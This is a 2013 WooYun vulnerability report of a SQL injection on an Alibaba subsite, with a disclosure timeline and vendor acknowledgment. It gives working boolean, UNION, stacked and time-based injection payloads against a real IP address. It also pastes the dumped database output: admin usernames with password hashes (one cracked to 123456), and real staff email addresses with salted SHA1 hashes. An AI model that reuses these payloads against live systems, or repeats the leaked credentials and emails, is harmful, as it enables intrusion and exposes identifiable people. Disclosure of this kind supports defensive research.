当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036749

漏洞标题:阿里巴巴某分站sql注入漏洞一枚

相关厂商:阿里巴巴

漏洞作者: D&G

提交时间:2013-09-11 10:18

修复时间:2013-10-26 10:19

公开时间:2013-10-26 10:19

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-11: 细节已通知厂商并且等待厂商处理中
2013-09-11: 厂商已经确认,细节仅向厂商公开
2013-09-21: 细节向核心白帽子及相关领域专家公开
2013-10-01: 细节向普通白帽子公开
2013-10-11: 细节向实习白帽子公开
2013-10-26: 细节向公众公开

简要描述:

sql注入。虽然不应该有这种问题,但是还是出现了。不过权限控制比较好。

详细说明:

http://110.75.66.103/carnival/history/schedule/2013/detail/main/261

Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261 AND 1667=1667
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261 UNION ALL SELECT NULL,NULL,CONCAT(0x3a6378623a,0x676a69624b6a4b634a6d,0x3a7879653a),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261 AND SLEEP(5)
---
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0.11


web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0.11
banner: '5.1.61-Alibaba-121011-log'


对数据稍微分析了下,想看看能不能深入,结果本人小菜。。

[*] adc
[*] devclub
[*] information_schema
[*] mysql
[*] tdc


database management system users [1]:
[*] 'adc_admin'@'%'


虽然有多个库。目测应该是用的同一个数据库帐号。对mysql库,只有几个性能相关的表有权限。虽然@%,但是必然只开80端口,外联貌似没什么希望。
3个库,应该是对应3个网站。devclub这个库分析了下:采用的是dilicms。猜测是一个叫淘宝技术沙龙的网站,不过现在devloperclub.taobao.com这个域名不用了。改叫阿里技术沙龙了。看来是废弃的了。

Database: devclub
Table: dili_admins
[1 entry]
+-----+------+--------------+----------+-------------------------------------------+
| uid | role | email | username | password |
+-----+------+--------------+----------+-------------------------------------------+
| 1 | 1 | dili@cms.com | admin | e10adc3949ba59abbe56e057f20f883e (123456) |
+-----+------+--------------+----------+-------------------------------------------+


剩下的两个库,看名字adc,tdc,库的结构比比较相似。

Database: adc
Table: admin
[7 entries]
+----+------+-------+---------------+------------------+----------------------------------+-----------+
| id | salt | roles | email | username | password | is_active |
+----+------+-------+---------------+------------------+----------------------------------+-----------+
| 1 | NULL | 1 | we3ew@163.com | we3ew | 4a9b98e23425dbb1869d53d22d204c6b | 0 |
| 2 | NULL | 1 | <blank> | ali_admin | 613ed8ed6425fc58648a00bcccbc5c78 | 0 |
| 3 | NULL | 3 | <blank> | d2_admin | c8facf28afca351e2d9be95a67be75c7 | 0 |
| 4 | NULL | 3 | <blank> | tcon_admin | 83e5606fff5bfcba0be141bf7592b7f1 | 0 |
| 5 | NULL | 3 | <blank> | iconference_admi | 6e59a80b7f718aa3cbae34dc4d3c3321 | 0 |
| 6 | NULL | 3 | <blank> | idataforum_admin | ea5e7362db436c30411a1a3353b3a728 | 0 |
| 7 | NULL | 3 | <blank> | act_admin | f43ea5b5042d09687c29ff7a428d705b | 0 |
+----+------+-------+---------------+------------------+----------------------------------+-----------+


Database: adc
Table: auth_user
[4 entries]
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+------------+---------------------+---------------------+--------------+
| id | email | username | is_staff | password | last_name | is_active | first_name | last_login | date_joined | is_superuser |
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+------------+---------------------+---------------------+--------------+
| 1 | luqi@taobao.com | luqi | 1 | sha1$eff86$c48f691deffc2eca07865202fb786bc197e20ad6 | <blank> | 1 | <blank> | 2012-06-05 19:49:00 | 2011-06-14 11:40:03 | 1 |
| 2 | <blank> | shenhe | 1 | sha1$f625e$fc4a062615a2836990a9609f8237c37fd56c1d01 | <blank> | 1 | <blank> | 2012-04-10 18:11:59 | 2011-06-16 19:08:59 | 0 |
| 3 | suqian.yf@taobao.com | suqian.yf | 1 | sha1$0150f$e714a969d6ae99a253d4e6f926dcf35cadab498e | <blank> | 1 | <blank> | 2011-08-19 12:16:34 | 2011-08-18 20:38:08 | 1 |
| 4 | <blank> | qigong | 1 | sha1$721fd$ef2255ea8a9f56d775f10ea6020d4f6b150661c9 | <blank> | 1 | <blank> | 2012-03-20 10:59:17 | 2011-08-19 12:13:44 | 0 |
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+-------


sha1加密。加盐。有一个cmd5就可以直接查到。
读取文件失败,貌似没有文件权限,这个比较好。这次的危害就可以控制在一些数据信息泄漏的层面。没有找到后台,测试么,就不爆破了。不过思路还有一些,毕竟可以控制数据库了。大牛应该还能玩点花样出来。

漏洞证明:

Database: adc
Table: auth_user
[4 entries]
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+------------+---------------------+---------------------+--------------+
| id | email | username | is_staff | password | last_name | is_active | first_name | last_login | date_joined | is_superuser |
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+------------+---------------------+---------------------+--------------+
| 1 | luqi@taobao.com | luqi | 1 | sha1$eff86$c48f691deffc2eca07865202fb786bc197e20ad6 | <blank> | 1 | <blank> | 2012-06-05 19:49:00 | 2011-06-14 11:40:03 | 1 |
| 2 | <blank> | shenhe | 1 | sha1$f625e$fc4a062615a2836990a9609f8237c37fd56c1d01 | <blank> | 1 | <blank> | 2012-04-10 18:11:59 | 2011-06-16 19:08:59 | 0 |
| 3 | suqian.yf@taobao.com | suqian.yf | 1 | sha1$0150f$e714a969d6ae99a253d4e6f926dcf35cadab498e | <blank> | 1 | <blank> | 2011-08-19 12:16:34 | 2011-08-18 20:38:08 | 1 |
| 4 | <blank> | qigong | 1 | sha1$721fd$ef2255ea8a9f56d775f10ea6020d4f6b150661c9 | <blank> | 1 | <blank> | 2012-03-20 10:59:17 | 2011-08-19 12:13:44 | 0 |
+----+----------------------+-----------+----------+-----------------------------------------------------+-----------+-----------+-------

修复方案:

不班门弄斧了。泄漏的密码要改掉。乌云是不打码的。。。也是渗透测试时候的一个信息来源。

版权声明:转载请注明来源 D&G@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-11 14:19

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复~~ 谢谢~

最新状态:

暂无